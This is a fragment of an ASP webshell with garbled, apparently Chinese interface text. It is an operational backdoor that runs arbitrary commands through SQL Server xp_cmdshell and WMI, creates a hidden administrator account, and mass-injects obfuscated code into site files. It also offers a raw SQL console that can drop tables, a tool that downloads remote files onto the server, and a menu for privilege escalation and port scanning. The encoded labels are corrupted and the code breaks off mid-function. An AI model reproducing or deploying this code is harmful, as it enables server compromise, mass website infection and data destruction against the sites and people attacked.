echo"CMD?＆#252;＆#225;?￡o<input type=text name=MMD size=35 >  ??o?￡o<input type=text name=U value='"&Session("sqluser")&"'>  ?＆#252;??￡o<input type=text name=P value='"&Session("sqlpass")&"'><input type=submit value=?′DD></form></tr></table>"
If trim(request.form("MMD"))<>"" Then
password= trim(Request.form("P"))
id=trim(Request.form("U"))
Session("sqluser")=id:Session("sqlpass")=password
set adoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id
strQuery = "exec master.dbo.xp_cmdshell '" & request.form("MMD") & "'"
set recResult = adoConn.Execute(strQuery)
If NOT recResult.EOF Then
Do While NOT recResult.EOF
strResult = strResult & chr(13) & recResult(0)
recResult.MoveNext
Loop
End if
set recResult = Nothing
strResult = Replace(strResult," "," ")
strResult = Replace(strResult,"<","<")
strResult = Replace(strResult,">",">")
strResult = Replace(strResult,chr(13),"<br>")
End if
set adoConn = Nothing:Response.Write request.form("MMD") & "<br>"& strResult
end FuncTion

'wmi??3＆#236;?＆#252;＆#225;?
Function wmi()
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
echo "<form name=""form1"" method=""post"" action=""?Action=wmi"">"
echo " ??3＆#236;?′DD?＆#252;＆#225;?"
echo "<input name=""xd"" type=""text"" id=""xd"" value='"192.168.2.1","root/cimv2","administrator","328825645"' size=""70"">"
echo " <input type=""submit"" name=""Submit"" value=""＆#236;＆#225;??"">"
echo "</form>"
if request("xd")<>"" then
set ww=server.createobject("wbemscripting.swbemlocator")
set cc=ww.connectserver(request("xd"))
set ss=cc.get("Win32_ProcessStartup")
Set oC=ss.SpawnInstance_
oC.ShowWindow=12
Set pp=cc.get("Win32_Process")
Response.Write pp.create("net user",null,oC,intProcessID)
Response.Write "<br>"&intProcessID
Response.end
end if
End Function

'＆#224;??＆#225;′＆#243;＆#234;?0day
sub lp()
echo"<form action='?action=lp' method=post>"
echo"<center><br>"
echo"＆#243;??＆#167;:<input name='username' type='text' value='test'><br>"
echo"?＆#252;??:<input name='passwd' type='text' value='123456'><br>"
echo"<input type='submit' value='＆#236;＆#237; ?＆#243;'></form>"
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "＆#234;＆#167;＆#176;＆#252;"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"＆#233;?′?μ???")>0 then
response.write "??＆#243;D′＆#237;?＆#243;,o??＆#243;＆#242;2???＆#168;＆#225;￠3＆#233;1|￡?"
else
Response.write "OMG!"&username&"3＆#233;1|￡?"
end if
end if
else
response.write "??＆#234;?＆#232;?＆#234;?＆#232;?＆#243;??＆#167;??"
end if
end if
end sub

'??＆#177;????＆#247;

'?＆#250;＆#225;?1＆#242;?＆#237;???＆#237;＆#236;???
sub plgm()
Response.Buffer =true
Fpath=Request("fd")
addcode = Request("code")
addcode2 = Request("code2")
pcfile=request("pcfile")
checkbox=request("checkbox")
checkbox1=request("checkbox1")
ShowMsg=request("ShowMsg")
FType=request("FType")
zfile=request("zfile")
M=request("M")

for i= 0 to ubound(split(server.mappath("."),"\"))
d=split(server.mappath("."),"\")
dir=dir&d(i)&"\"
filename=dir&"dir.txt"
On Error Resume Next
SET FSO=Server.CreateObject("Scripting.FileSystemObject")
SET FR = FSO.CreateTextFile(filename,true)
IF NOT FSO.FileExists(filename) then
else
FR.close
FSO.DeleteFile filename,True
exit for
end if
next
if zfile="" then zfile="default|index|conn|admin|reg|main|vip|qq|mm|"
if Ftype="" then Ftype="htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
if Fpath="\" then Fpath=Server.MapPath("\")
if Fpath="." or Fpath="" then Fpath=dir
if addcode="" then addcode=""
if checkbox="" then checkbox=request("checkbox")
if checkbox1="" then checkbox1=request("checkbox1")
if pcfile="" then
pcfileName=Request.ServerVariables("SCRIPT_NAME")
pcfilek=split(pcfileName,"/")
pcfilen=ubound(pcfilek)
pcfile=pcfilek(pcfilen)
end if
call Css()
     if M="1" then BT="?＆#250;＆#225;?1＆#242;?＆#237;?＆#247;-?＆#250;＆#225;?1＆#242;?＆#237;"
if M="2" then BT="?＆#250;＆#225;????＆#237;?＆#247;-??3y＆#177;e＆#232;?μ?＆#237;??＆#237;"
if M="3" then BT="?＆#250;＆#225;?＆#236;????＆#247;-???t＆#236;???DT??1＆#164;??"
if M="4" then BT="???＆#168;1＆#242;?＆#237;"
echo "<form method=POST><TABLE width=80% border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#666666><TR><TD colspan=2 ><B>"&BT&"</B></TD></TR><tr><td >＆#237;????＆#249;?????＆#176;\?＆#177;￡o</td><td>"&Server.MapPath("/")&"</td></tr><tr><td >＆#177;?3＆#236;D＆#242;?????＆#176;.?＆#177;￡o</td><td>"&Server.MapPath(".")&"</td></tr><tr><td width='20%'>???t?＆#183;??￡o</td>"
echo "<td><input type=text name=fd value='"&Fpath&"' size=40><font  color=red >==>＆#215;￠＆#242;a:???＆#183;??＆#234;?＆#215;?′＆#243;?＆#233;D′????(＆#215;??ˉ?D＆#177;e)</font> </td></tr>"
echo "<tr><td>＆#234;?＆#183;?＆#177;?D?′＆#250;??￡o</td><td><input class=c name='checkbox1'  checked='checkbox1' type=checkbox value=""checked1"" "&checkbox1&"><font  color=red >D′＆#232;?′＆#250;??＆#234;＆#177;＆#176;?′＆#250;??＆#177;?D?＆#242;?o＆#243;D′＆#232;???＆#242;??????t￡＆#168;?a＆#225;?＆#183;＆#224;?1?＆#250;＆#225;?＆#236;???μ?′＆#250;??￡?′＆#250;??100%?y3￡??DD￡?</font></td></tr>"
if M="1" then echo "<tr><td>1y?????′￡o</td><td><input class=c name='checkbox' checked='checked' type=checkbox value=""checked"" "&checkbox&"> ＆#183;＆#224;?1＆#242;???＆#242;3???D＆#243;D?＆#224;?????′μ?′＆#250;??</td></tr>"
if M="4" then echo "<tr><td>1y?????′￡o</td><td><input class=c name='checkbox' checked='checked' type=checkbox value=""checked"" "&checkbox&"> ＆#183;＆#224;?1＆#242;???＆#242;3???D＆#243;D?＆#224;?????′μ?′＆#250;??</td></tr><tr><td>???＆#168;???t￡o</td><td><input name='zfile' type=text id='zfile' value='"&zfile&"' size=40>＆#236;?D′??＆#242;a1＆#242;???t??[2?o?＆#224;??1??]</td></tr>"
echo "<tr><td >??3y???t￡o</td>"
echo "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40>＆#224;y＆#232;?￡o1.asp|2.asp|3.asp</td></tr>"
echo "<tr><td>???t＆#224;＆#224;D＆#237;￡o</td>"
echo "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ＆#234;?＆#232;?＆#242;aDT??μ????t＆#224;＆#224;D＆#237;[＆#224;??1??]</td></tr><tr><td>"
if M="1" then echo"＆#242;a1＆#242;μ??＆#237;￡o"
if M="2" then echo"＆#242;a??μ??＆#237;￡o"
if M="3" then echo"2＆#233;?＆#242;?＆#250;＆#232;Y￡o"
echo"</font></td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
if M="3" then echo "<tr><td>＆#236;? ?? ?a￡o</td><td ><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
echo "<tr><td></td><td> <input name=submit type=submit value=?a＆#234;??′DD> --＆#177;＆#234;???a＆#234;＆#237;--[3＆#233;1|￡o?＆#236; ￡? ??3y￡o?＆#225; ￡? ???′￡o<font color=red>?＆#225;</font>]</td></tr>"
echo "</table></form>"
if request("submit")="?a＆#234;??′DD" then
echo "<TABLE width=80% border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#666666><TR><TD   align=center>?＆#225;1?</TD><TD  >???t?????＆#183;??</TD><TD   width='30%' align=center>＆#177;＆#224;?-＆#224;?</TD></TR>"
'call InsertAllFiles(Fpath,addcode,pcfile)

dim Wpath,Wcode,pc
Wpath=Fpath
Wcode=addcode
pc=pcfile
Server.ScriptTimeout=999999999
if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
Set WFSO = CreateObject("Scripting.FileSystemObject")
on error resume next
Set f = WFSO.GetFolder(Wpath)
Set fc2 = f.files
For Each myfile in fc2
Set FS1 = CreateObject("Scripting.FileSystemObject")
FType1=split(myfile.name,".")
FType2=ubound(FType1)
zfile1=FType1(FType2-1)
if Ftype2>0 then
FType3=LCase(FType1(FType2))
else
FType3="?T"
end if
if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
dim ED
ED= "<td align=center> <a href='＆#106avascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='????'> Down </a><a href='＆#106avascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='＆#177;＆#224;?-'>   edit </a><a href='＆#106avascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'  ＆#111nclick='return yesok()' class='am' title='＆#233;?3y'>   Del </a><a href='＆#106avascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='?′??'>    Copy</a><a href='＆#106avascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='＆#242;??ˉ'>   Move </a></td></tr>"
select case M
    case "4"
        if Instr("|"&zfile&"|","|"&zfile1&"|")<>0   then
if checkbox<>"checked" then
Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
    if checkbox1<>"checked1" then
tfile.writeline Wcode
else
tfile.writeline Morficoders(Wcode)
end if
echo"<tr><td align=center>?＆#236;</td><td>"&Wpath&myfile.name&"</td>"
echo ED
tfile.close
else
Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
if Instr(tfile1.readall,Wcode)=0 then
Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
    if checkbox1<>"checked1" then
tfile.writeline Wcode
else
tfile.writeline Morficoders(Wcode)
end if
echo"<tr><td align=center>?＆#236;</td><td>"&Wpath&myfile.name&"</td>"
echo ED
tfile1.close
else
echo"<tr><td align=center><font color=red>?＆#225;</font></td><td>"&Wpath&myfile.name&"</td>"
echo ED
tfile1.close
end if
Set tfile1=Nothing
end if
end if
case "1"
if checkbox<>"checked" then
Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
tfile.writeline Wcode
echo"<tr><td align=center>?＆#236;</td><td>"&Wpath&myfile.name&"</td>"
echo ED
tfile.close
else
Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
if Instr(tfile1.readall,Wcode)=0 then
Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
tfile.writeline Wcode
echo"<tr><td align=center>?＆#236;</td><td>"&Wpath&myfile.name&"</td>"
echo ED
tfile1.close
else
echo"<tr><td align=center><font color=red>?＆#225;</font></td><td>"&Wpath&myfile.name&"</td>"
echo ED
tfile1.close
end if
Set tfile1=Nothing
end if
case "2"
Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
NewCode=Replace(tfile1.readall,Wcode,"")
Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
echo"<tr><td align=center>?＆#236;</td><td>"&Wpath&myfile.name&"</td>"
echo ED
Set objCountFile=Nothing
case "3"
Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
NewCode=Replace(tfile1.readall,Wcode,addCode2)
Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
    echo"<tr><td align=center>?＆#236;</td><td>"&Wpath&myfile.name&"</td>"
echo ED
Set objCountFile=Nothing
case else
echo"′＆#243;??,＆#177;e?＆#242;＆#224;′.":response.end
end select
end if
Next
  Set fsubfolers = f.SubFolders
  For Each f1 in fsubfolers
NewPath=Wpath&""&f1.name
Response.Flush
   InsertAllFiles NewPath,Wcode,pc
  Next
set tfile=nothing
Set FSO = Nothing
set tfile=nothing
set tfile2=nothing
Set WFSO = Nothing
end if
end sub
function Morficoders(code)
dim coders,codelen,codeu,Newcode,Newcoders
code=replace(code,"height=","name='"&GetRnd(1000,9999)&"' height=")
code=replace(code," ","|")
code=replace(code,"||","|")
code=replace(code,"||","|")
coders=split(code,"|")
for i=0 to ubound(coders)
codelen=len(coders(i))
codeu=mid(coders(i),GetRnd(1,codelen),1)
Newcode=replace(coders(i),codeu,ucase(codeu))
Newcoders=Newcoders&" "&Newcode
next
Morficoders=Newcoders
End function
function GetRnd(min,max)
  Randomize
  GetRnd = Int((max - min + 1) * Rnd + min)
End function

'＆#234;y?Y?a2＆#249;＆#215;＆#247;
function DbManager()
  SqlStr=Trim(Request.Form("SqlStr"))
   DbStr=Request.Form("DbStr")
   SI=SI&"<table width='650'  border='0' cellspacing='0' cellpadding='0'>"
   SI=SI&"<form name='DbForm' method='post' action=''>"
   SI=SI&"<tr><td width='100' height='27'>  ＆#234;y?Y?a＆#225;??＆#243;′?:</td>"
   SI=SI&"<td><input name='DbStr' style='width:470' value="""&DbStr&"""></td>"
   SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>＆#225;??＆#243;′?＆#234;?＆#224;y</option><option value=0>Access＆#225;??＆#243;</option>"
   SI=SI&"<option value=1>MsSql＆#225;??＆#243;</option><option value=2>MySql＆#225;??＆#243;</option><option value=3>DSN＆#225;??＆#243;</option>"
   SI=SI&"<option value=-1>--SQL＆#243;?＆#183;＆#168;--</option><option value=4>??＆#234;?＆#234;y?Y</option><option value=5>＆#236;＆#237;?＆#243;＆#234;y?Y</option>"
   SI=SI&"<option value=6>＆#233;?3y＆#234;y?Y</option><option value=7>DT??＆#234;y?Y</option><option value=8>?＆#168;＆#234;y?Y＆#177;＆#237;</option>"
   SI=SI&"<option value=9>＆#233;?＆#234;y?Y＆#177;＆#237;</option><option value=10>＆#236;＆#237;?＆#243;＆#215;???</option><option value=11>＆#233;?3y＆#215;???</option>"
   SI=SI&"<option value=12>＆#237;＆#234;＆#232;???＆#234;?</option></select></td></tr>"
   SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"
   SI=SI&"<tr><td height='30'> SQL2＆#249;＆#215;＆#247;?＆#252;＆#225;?:</td>"
   SI=SI&"<td><input name='SqlStr' style='width:470' value="""&SqlStr&"""></td>"
   SI=SI&"<td align='center'><input type='submit' name='Submit' value='?′DD' ＆#111nclick='return DbCheck()'></td>"
   SI=SI&"</tr></form></table><span id='abc'></span>"
   echo SI:SI=""
   If Len(DbStr)>40 Then
   Set Conn=CreateObject("Adodb.connection")
   Conn.Open DbStr
   Set Rs=Conn.OpenSchema(20)
   SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>＆#177;＆#237;<br>??</td>"
   Rs.MoveFirst
   Do While Not Rs.Eof
     If Rs("TABLE_TYPE")="TABLE" then
  TName=Rs("TABLE_NAME")
       SI=SI&"<td align=center><a href=""＆#106avascript:if(confirm('＆#232;＆#183;?＆#168;＆#233;?3y?′￡?'))FullSqlStr('DROP TABLE ["&TName&"]',1)"">[ del ]</a><br>"
       SI=SI&"<a href='＆#106avascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
     End If
     Rs.MoveNext
   Loop
   Set Rs=Nothing
   SI=SI&"</tr></table>"
   echo SI:SI=""
If Len(SqlStr)>10 Then
   If LCase(Left(SqlStr,6))="select" then
     SI=SI&"?′DD＆#243;???￡o"&SqlStr
     Set Rs=CreateObject("Adodb.Recordset")
     Rs.open SqlStr,Conn,1,1
     FN=Rs.Fields.Count
     RC=Rs.RecordCount
     Rs.PageSize=20
     Count=Rs.PageSize
     PN=Rs.PageCount
     Page=request("Page")
     If Page<>"" Then Page=Clng(Page)
     If Page="" Or Page=0 Then Page=1
     If Page>PN Then Page=PN
     If Page>1 Then Rs.absolutepage=Page
     SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"
     For n=0 to FN-1
       Set Fld=Rs.Fields.Item(n)
       SI=SI&"<td align='center'>"&Fld.Name&"</td>"
       Set Fld=nothing
     Next
     SI=SI&"</tr>"
     Do While Not(Rs.Eof or Rs.Bof) And Count>0
  Count=Count-1
  Bgcolor="#EFEFEF"
  SI=SI&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"
  For i=0 To FN-1
         If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
         If RC=1 Then
            ColInfo=HTMLEncode(Rs(i))
         Else
            ColInfo=HTMLEncode(Left(Rs(i),50))
         End If
    SI=SI&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
  Next
  SI=SI&"</tr>"
       Rs.MoveNext
     Loop
echo SI
SI=""
SqlStr=HtmlEnCode(SqlStr)
     SI=SI&"<tr><td colspan="&FN+1&" align=center>????＆#234;y￡o"&RC&" ＆#242;3??￡o"&Page&"/"&PN
     If PN>1 Then
       SI=SI&"  <a href='＆#106avascript:FullSqlStr("""&SqlStr&""",1)'>＆#234;＆#215;＆#242;3</a> <a href='＆#106avascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>＆#233;?＆#242;?＆#242;3</a> "
       If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
       For i=Sp To Sp+8
         If i>PN Then Exit For
         If i=Page Then
         SI=SI&i&" "
         Else
         SI=SI&"<a href='＆#106avascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a> "
         End If
       Next
  SI=SI&" <a href='＆#106avascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>??＆#242;?＆#242;3</a> <a href='＆#106avascript:FullSqlStr("""&SqlStr&""","&PN&")'>?2＆#242;3</a>"
     End If
     SI=SI&"<hr color='#EFEFEF'></td></tr></table>"
     Rs.Close:Set Rs=Nothing
echo SI:SI=""
   Else
     Conn.Execute(SqlStr)
     SI=SI&"SQL＆#243;???￡o"&SqlStr
   End If
   echo SI:SI=""
End If
   Conn.Close
   Set Conn=Nothing
   End If
End function

'??3＆#236;????
Function remotedown()
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>"
echo "????μ?＆#183;t???＆#247;:?T????...?a＆#225;??＆#250;＆#234;?.?＆#249;＆#242;??T????<hr/>"
echo "<form method=post>"
echo "<input name=theUrl value='http://' size=80><input type=submit value=' ???? '><br/>"
echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
echo "<input type=checkbox name=overWrite value=2>′??＆#250;?2??"
echo "<input type=hidden value=downFromUrl name=theAct>"
echo "</form>"
echo "<hr/>"
If isDebugMode = False Then
On Error Resume Next
End If
Dim Http, theUrl, thePath, stream, fileName, overWrite
theUrl = Request("theUrl")
thePath = Request("thePath")
overWrite = Request("overWrite")
Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
Set Http = Server.CreateObject("MSXML2.XMLHTTP")

If overWrite <> 2 Then
overWrite = 1
End If

Http.Open "GET", theUrl, False
Http.Send()
If Http.ReadyState <> 4 Then

End If

With stream
.Type = 1
.Mode = 3
.Open
.Write Http.ResponseBody
.Position = 0
.SaveToFile thePath, overWrite
If Err.Number = 3004 Then
Err.Clear
fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
If fileName = "" Then
fileName = "index.htm.txt"
End If
thePath = thePath & "\" & fileName
.SaveToFile thePath, overWrite
End If
.Close
End With
chkErr(Err)

Set Http = Nothing
Set Stream = Nothing

If isDebugMode = False Then
On Error Resume Next
End If
End Function

rem =============================================
'1|?＆#252;????2?＆#183;?
call css()
If action <> "" Then
check()
End If
call login()

select case action
case "MainMenu"
MainMenu()
   Case "Show1File"
     Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
'???????t
   Case "DownFile":DownFile FName:ShowErr()
   '＆#233;?3y???t
   Case "DelFile"
     Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
  '＆#177;＆#224;?-???t
   Case "EditFile"
     Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
  '?′?????t
   Case "CopyFile"
     Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
   '＆#242;??ˉ???t
   Case "MoveFile"
     Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
  '＆#233;?3y????
   Case "DelFolder"
     Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
   'D??＆#168;????
   Case "CopyFolder"
     Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
  '＆#242;??ˉ????
   Case "MoveFolder"
     Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
   'D??＆#168;????
   Case "NewFolder"
     Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
case "PageAddToMdb"
pageaddtomdb()
case "plupfile"
PageUpload()
Case "ScanDriveForm"
  ScanDriveForm
  Case "ScanDrive"
   ScanDrive Request("Drive")
   Case "ScFolder"
    ScFolder Request("Folder")
   Case "ReadREG":call ReadREG()
   case "ScanPort"
   scanport()
Case "ServerInfo":ServerInfo()
Case "Logout"
logout()
Case "talk"
talk()
case "Course"
course()
case "GetTeRmiNAlINfo"
GetTeRmiNAlINfo()
case "Alexa"
Alexa(AlexaURL)
case "Servu"
call Servu():Err.Clear
case "addservu"
addservu()
case "Cmd1Shell"
Cmd1Shell()
case "sqlcmd"
sqlcmd()
case "wmi"
wmi()
case "lp"
lp()
case "PageExecute"
PageExecute()
case "findmuma"
   dim Report
if request.QueryString("act")<>"scan" then
    call Css()
echo kge
echo "<form action=""?Action=findmuma&act=scan"" method=""post"" name=""form1""><TABLE cellSpacing=1 cellPadding=3 width='80%' align=center bgcolor=#666666 border=0><TBODY><TR><TD  colSpan=2><B><FONT>2＆#233;?＆#242;???＆#237;-???t???＆#247;</FONT></B></TD></TR><TR><TD width='20%'>＆#237;????＆#249;????;</TD><TD>"&Server.MapPath("/")&"</TD></TR><TR><TD>＆#177;?3＆#236;D＆#242;????:</TD><TD>"&Server.MapPath(".")&"</TD></TR><TR><TD>＆#236;?＆#232;???＆#242;a?＆#236;2＆#233;μ??＆#183;??:</TD><TD><input name=""path"" type=""text""  value=""."" size=""30"" /> ＆#236;??＆#176;\?＆#177;＆#237;????＆#249;????￡??＆#176;.?＆#177;?a＆#177;?3＆#236;D＆#242;????</TD></TR><TR><TD>????2＆#233;?＆#242;???＆#243;:</TD><TD><input class=c name=""radiobutton"" type=""radio"" value=""sws"" ＆#111nClick=""document.getElementById('showFile1').style.display='none'"" checked>2＆#233;ASP ?＆#237;<input class=c type=""radio"" name=""radiobutton"" value=""sf"" ＆#111nClick=""document.getElementById('showFile1').style.display=''"">???＆#247;＆#183;?o?＆#236;??t?????t</TD></TR><TR><TD><input type=""submit"" value="" ?a＆#234;?＆#233;＆#168;?＆#232; "" /></TD><TD><br /><div id=""showFile1"" style=""display:none"">  2＆#233;?＆#242;?＆#250;＆#232;Y￡o<input name=""Search_Content"" type=""text"" id=""Search_Content"" style=""border:1px solid #999"" size=""20"">＆#242;a2＆#233;?＆#242;μ?＆#215;?＆#183;?′?￡?2?＆#236;??＆#237;????DD＆#232;??＆#250;?＆#236;2＆#233;<br />  DT??＆#232;??＆#250;￡o<input name=""Search_Date"" type=""text"" style=""border:1px solid #999"" value="""&Left(Now(),InStr(now()," ")-1)&""" size=""20""> ?＆#224;??＆#232;??＆#250;＆#243;?;???a￡?＆#232;?＆#242;a＆#232;??＆#250;＆#236;?D′ <a href=""#"" ＆#111nClick=""＆#106avascript:form1.Search_Date.value='ALL'"">ALL</a><br />  ???t＆#224;＆#224;D＆#237;￡o<input name=""Search_FileExt"" type=""text"" style=""border:1px solid #999"" value=""*"" size=""20""> ＆#224;＆#224;D＆#237;????＆#243;?,???a￡?*＆#177;＆#237;＆#234;??＆#249;＆#243;D＆#224;＆#224;D＆#237;<br /><br /></div></TD></TR></TBODY></TABLE></form>"
else
server.ScriptTimeout = 600
if request.Form("path")="" then
echo("No Hack")
response.End()
end if
if request.Form("path")="\" then
TmpPath = Server.MapPath("\")
elseif request.Form("path")="." then
TmpPath = Server.MapPath(".")

else
TmpPath = Server.MapPath("\")&"\"&request.Form("path")
end if
timer1 = timer
Sun = 0
SumFiles = 0
SumFolders = 1
If request.Form("radiobutton") = "sws" Then
DimFileExt = "asp,cer,asa,cdx"
Call ShowAllFile(TmpPath)
Else
If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
call Css()
echo("??2?＆#236;??t2?＆#237;＆#234;＆#232;?￡?????′＆#243;?＆#252;<br><br><a href='＆#106avascript:history.go(-1);'>??＆#183;μ????D?＆#234;?＆#232;?</a>")
response.End()
End If
DimFileExt = request.Form("Search_fileExt")
Call ShowAllFile2(TmpPath)
End If
echo "<TABLE cellSpacing=1 cellPadding=3 width='100%' align=center bgcolor=#666666 border=0>"
echo "<TR><TD  colSpan=2><B><FONT>?＆#250;＆#225;?1＆#242;?＆#237;?＆#247;-????1＆#242;?＆#237;</FONT></B></TD></TR>"
echo "<tr><td>"
echo "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid #89441f;padding:4px;display:none""></div>"
echo "＆#233;＆#168;?＆#232;＆#237;＆#234;＆#177;?￡?＆#242;?12?＆#236;2＆#233;???t?D<font color=""#FF0000"">"&SumFolders&"</font>??￡????t<font color=""#FF0000"">"&SumFiles&"</font>??￡?＆#183;￠???＆#233;＆#242;＆#233;μ?<font color=""#FF0000"">"&Sun&"</font>??"
echo "<TABLE cellSpacing=1 cellPadding=3 width='100%' align=center bgcolor=#666666 border=0><tr>"
If request.Form("radiobutton") = "sws" Then
echo "<td width=""15%"">???t?＆#224;???＆#183;??</td><td width=""15%"">＆#236;??＆#247;??</td><td >?＆#232;＆#234;?</td><td width=""20%"">′′?＆#168;/DT??＆#234;＆#177;??</td>"
else
echo "<td width=""30%"">???t?＆#224;???＆#183;??</td><td width=""20%"">???t′′?＆#168;＆#234;＆#177;??</td><td width=""20%"">DT??＆#234;＆#177;??</td>"
end if
echo "</tr>"
echo Report
echo "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
echo "<br><font style='font-size:12px'>＆#177;?＆#242;3?′DD12＆#243;?＆#225;?"&thetime&"o＆#225;??</font>"
end if
Sub ShowAllFile(Path)
Set F1SO = CreateObject("Scripting.FileSystemObject")
if not F1SO.FolderExists(path) then exit sub
Set f = F1SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then
Call ScanFile(Path&Temp&"\"&myfile.name, "")
SumFiles = SumFiles + 1
End If
Next
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile path&"\"&f1.name
SumFolders = SumFolders + 1
     Next
Set F1SO = Nothing
End Sub
Sub ScanFile(FilePath, InFile)
If InFile <> "" Then
Infiles = "<font color=red>?????t＆#177;?<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(InFile)&""" target=_blank>"& InFile & "</a>???t＆#176;＆#252;o??′DD</font>"
End If
Set FSO1s = CreateObject("Scripting.FileSystemObject")
on error resume next
set ofile = FSO1s.OpenTextFile(FilePath)
filetxt = Lcase(ofile.readall())
If err Then Exit Sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a>"
If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
Report = Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell ?＆#242;?? clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font color=red>?￡??＆#215;＆#233;?t￡?＆#242;?＆#176;?＆#177;?ASP???＆#237;＆#224;?＆#243;?</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End if
If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
Report = Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application ?＆#242;?? clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font color=red>?￡??＆#215;＆#233;?t￡?＆#242;?＆#176;?＆#177;?ASP???＆#237;＆#224;?＆#243;?</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
End If
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|＆#106avascript).encode\b"
If regEx.Test(filetxt) Then
